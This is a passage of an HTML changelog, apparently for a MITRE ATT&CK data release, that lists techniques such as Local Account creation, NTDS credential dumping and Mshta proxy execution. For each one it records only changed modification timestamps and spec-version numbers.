collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:32.515000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1136.001] Create Account: Local Account</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:51.903000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr></tbody></table></details><hr><h4>[T1078.003] Valid Accounts: Local Accounts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:51:08.702000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1074.001] Data Staged: Local Data Staging</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:28.868000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1114.001] Email Collection: Local Email Collection</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:29.669000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1069.001] Permission Groups Discovery: Local Groups</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:10.014000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1680] Local Storage Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-22 02:09:54.940000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.014] System Binary Proxy Execution: MMC</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:39:47.445000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1127.001] Trusted Developer Utilities Proxy Execution: MSBuild</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:45:30.815000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1134.003] Access Token Manipulation: Make and Impersonate Token</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:56:16.233000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr></tbody></table></details><hr><h4>[T1204.004] User Execution: Malicious Copy and Paste</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-27 20:05:57.921000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1204.002] User Execution: Malicious File</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:31.674000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1204.001] User Execution: Malicious Link</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:35.144000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1587.001] Develop Capabilities: Malware</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:30.776000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1588.001] Obtain Capabilities: Malware</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:58.766000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.040000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.662000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.010] Masquerading: Masquerade Account Name</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:21:43.719000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.008] Masquerading: Masquerade File Type</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:39:13.971000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.004] Masquerading: Masquerade Task or Service</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:39:39.311000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.644000+00:00</td></tr></tbody></table></details><hr><h4>[T1036] Masquerading</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:32:00.311000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.005] Masquerading: Match Legitimate Resource Name or Location</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:39:41.881000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.013] System Binary Proxy Execution: Mavinject</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:39:41.553000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1213.005] Data from Information Repositories: Messaging Applications</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 22:48:58.763000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1556] Modify Authentication Process</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.977000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1578.005] Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.098000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1578] Modify Cloud Compute Infrastructure</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.919000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1666] Modify Cloud Resource Hierarchy</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.999000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1112] Modify Registry</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.021000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T1601] Modify System Image</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.013000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.003] Disable or Modify Tools: Modify or Spoof Tool UI</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:44:20.156000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.005] System Binary Proxy Execution: Mshta</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:40:01.325000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.676000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.007] System Binary Proxy Execution: Msiexec</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:40:01.230000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.006] Modify Authentication Process: Multi-Factor Authentication</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.875000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr></tbody></table></details><hr><h4>[T1111] Multi-Factor Authentication Interception</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:29.231000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1090.003] Proxy: Multi-hop Proxy</h4><p><b>Current version</b>: 2.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:11.774000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1480.002] Execution Guardrails: Mutual Exclusion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:07:21.724000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr></tbody></table></details><hr><h4>[T1003.003] OS Credential Dumping: NTDS</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:34.852000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1564.004] Hide Artifacts: NTFS File Attributes</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:24:50.745000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1557.001] Adversary-in-the-Middle: Name Resolution Poisoning and SMB Relay</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-03 16:53:09.295000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr></tbody></table></details><hr><h4>[T1106] Native API</h4><p><b>Current version</b>: 2.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 19:16:22.540000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr></tbody></table></details><hr><h4>[T1599.001] Network Boundary Bridging: Network Address Translation Traversal</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.887000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr></tbody></table></details><hr><h4>[T1599] Network Boundary Bridging</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 